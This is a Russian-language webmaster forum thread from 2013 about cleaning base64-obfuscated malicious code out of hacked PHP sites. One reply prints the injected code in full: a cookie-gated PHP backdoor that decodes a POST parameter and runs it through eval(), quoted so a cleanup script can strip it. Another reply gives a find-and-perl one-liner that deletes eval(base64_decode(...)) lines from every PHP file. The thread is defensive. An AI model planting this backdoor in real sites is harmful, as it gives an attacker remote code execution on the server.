разницы нет какая вставка и куда засунули, экранирование работает отлично - удаляется все что требуется без проблем и синтаксических ошибок...
Удаляем вредоносный код (base64...) со своих сайтов.
(Ответов: 41, Просмотров: 16636)
- 17.04.2013 11:08
- Регистрация: 05.03.2013
- Сообщений: 25
- Репутация: 2
- 20.04.2013 23:35
Kgtu5, бывают случаи, когда экранирование не работает. Я в таких случая использую вспомогательный софт/программы для обнаружения/удаления червей с сайта.
- 24.04.2013 00:36
- Регистрация: 30.11.2011
- Сообщений: 120
- Репутация: 20
Благодарю, часто сталкиваюсь с проблемой - скрытые ссылки в скриптах и шаблонах
- 04.05.2013 22:28
У меня на всех сайтах, и во многих папках эта сволота наделал множество файликов с вот таким кодом:
Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 1 сообщение(ий)):У вас нет прав чтобы видеть скрытый текст, содержащийся здесь.
Поясните, пожалуйста, что и как поставить в кавычки скрипта, чтобы эту мерзоту вычистить.
Заранее благодарен. - 05.05.2013 17:30
$virus_text = '
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
';
---------- Сообщение добавлено 17:30 ---------- Предыдущее 17:29 ----------
$virus_text = '
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
'; - 06.05.2013 01:31
Гендальф Серый, спасибо, но не проходит...
пишет:
"На веб-сайте произошла ошибка при получении _http://qqq.aa/delvir.php. Веб-сайт может быть закрыт на обслуживание или настроен неправильно." - 06.05.2013 01:36
Скрипт неплохой, но предпочитаю работать ручками, а то ведь так человек может заподозрить какой-то кусок кода, как вредоносный, а он окажется частью стандартного и все, каюк CMS. Кусок вызова функции, к примеру. Делайте бэкапы перед обработкой - забыли написать)
- 06.05.2013 21:48
Docadept, руками конечно лучше, а как вы их ищите?
- 02.06.2013 02:59
Господа, новая инфа про злополучный base64:
1. Коннектимся к серверу по SSH
2. выполняем команду3. done!find . -type f -name '*.php' -exec perl -pi -e 's/eval\(base64_decode\(\"DQp.*p9\"\)\)\;//g' '{}' \;
Если хостер не дал доступ по SSH - смело требуем от ТП, чтобы они выполнили вышеописанные действия. - 24.12.2013 00:25
во , спасибо большое автору) а то задолбался бороться уже с кодом уже этим вредоносным(
Тэги топика:
- delvir,
- joomla,
- борьба,
- быть,
- взять,
- вредоносный,
- есть,
- закодировать,
- запустить,
- кавычка,
- код,
- лекарство,
- можно,
- набор,
- найти,
- нашел,
- немного,
- нужный,
- первый,
- писать,
- поиск,
- предназначить,
- прописываться,
- работа,
- результат,
- сайт,
- сервер,
- скрипт,
- ссылка,
- текст,
- тема,
- тест,
- удаление,
- удалить,
- удалять,
- указать,
- файл,
- число,
- что-то
Похожие темы
Темы | Раздел | Ответов | Последний пост |
---|---|---|---|
Где вы берете картинки и фото для своих сайтов? | Вопросы от новичков | 36 | 02.01.2015 01:15 |
Аккаунты twitter для индексации своих сайтов | Услуги по SEO | 5 | 27.01.2013 18:38 |
Несколько своих сайтов: мобильная тематика и туризм | Покупка продажа сайтов | 6 | 12.06.2012 02:00 |
Продаю ссылки со своих сайтов (чаты). | Ссылки, статьи | 0 | 16.02.2012 17:54 |
Удаляем вредоносный код (фрейм) из DLE сайта | Дайджест блогосферы | 0 | 24.01.2011 20:30 |